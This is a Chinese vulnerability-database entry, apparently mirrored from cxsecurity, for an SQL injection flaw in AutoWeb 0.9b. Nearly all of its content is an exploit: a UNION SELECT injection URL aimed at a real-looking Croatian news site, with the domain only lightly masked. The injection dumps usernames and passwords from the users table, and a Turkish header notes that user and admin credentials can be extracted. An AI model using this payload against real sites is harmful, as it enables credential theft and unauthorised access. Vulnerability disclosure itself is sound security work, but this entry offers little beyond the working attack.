AutoWeb 0.9b SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044691 漏洞类型
发布时间 2013-07-23 更新时间 2013-07-23
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013070169
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
< ------------------- header data start ------------------- >

#############################################################

# Application Name : AutoWeb 0.9b

# Vulnerable Type : SqL Injection

# Infection : Kullanc ve Ynetici Bilgileri ekilebilir.

# Bug Fix Advice : Zararl karakterler filtrelenmelidir.

# Author : Lazmania61

# Example : http://www.sXaviXdelbene.hr/news.php?id=2&lang=IT&theme=savino&news=1

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

http://www.savinXodXene.hr/news.php?id=2&lang=IT&theme=savino&news=-1%20UnIOn%20SeLEct%201,group_concat%28username,0x94,password%29,3,4,5%20FrOm%20users

< -- bug code end of -- >